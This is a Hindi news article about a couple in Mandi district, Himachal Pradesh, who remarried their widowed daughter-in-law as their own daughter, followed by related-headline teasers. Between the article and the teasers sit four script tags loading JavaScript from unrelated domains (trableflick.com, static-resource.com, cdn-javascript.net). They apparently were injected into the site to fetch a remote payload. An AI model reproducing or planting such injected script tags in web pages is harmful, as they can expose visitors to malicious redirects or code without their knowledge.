<p>अक्सर ऐसा देखा या सुना जाता है कि बेटे की मौत होने के बाद सास-ससुर बहु को घर से निकाल देते हैं या उन्हें मायके वापस भेज देते हैं। लेकिन यहां जिला मंडी के उपमण्डल सरकाघाट की रखोह पंचायत के गध्यानी गांव के सास-ससुर ने बहु को बेटी बनाकर उसकी दोबारा धूमधाम से शादी करवाई।</p>
<p>जानकारी के अनुसार डेढ़ साल पहले हुई संतोषी देवी और ब्रह्मदास के बेटे की आकस्मिक मौत के बाद अपनी 31 साल की युवा बहू को डोली में बिठाकर उसके ससुराल हमीरपुर ज़िला के चबूतरा गांव के नरेन्द्र कुमार पुत्र फितूरी राम के घर को विदा किया है। विवाह की सभी रस्मों को निभाते हुए लड़की के सास-ससुर ने माता-पिता की तरह हिन्दू रीति रिवाजों से विवाह को सम्पन्न कराया।</p>
<p>गांव के मंदिर में विवाह की वेद सजाकर और अपने सगे संबंधियों की उपस्थिति में यह पुण्य कार्य सम्पन्न हुआ। दुल्हन की शादी चार साल पहले ब्रह्मदास के युवा बेटे के साथ हुई थी। लेकिन मोहाली में एक दुर्घटना में उसका देहांत हो गया था। ब्रह्मदास और संतोषी देवी के अपने घर में धाम का भी आयोजन किया और उनके सगे संबंधियों ने भी दिल-खोल कर लड़की और उसके दूल्हे को आशीर्वाद देने के बाद शगुन दिया।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1579327855239″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…
Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…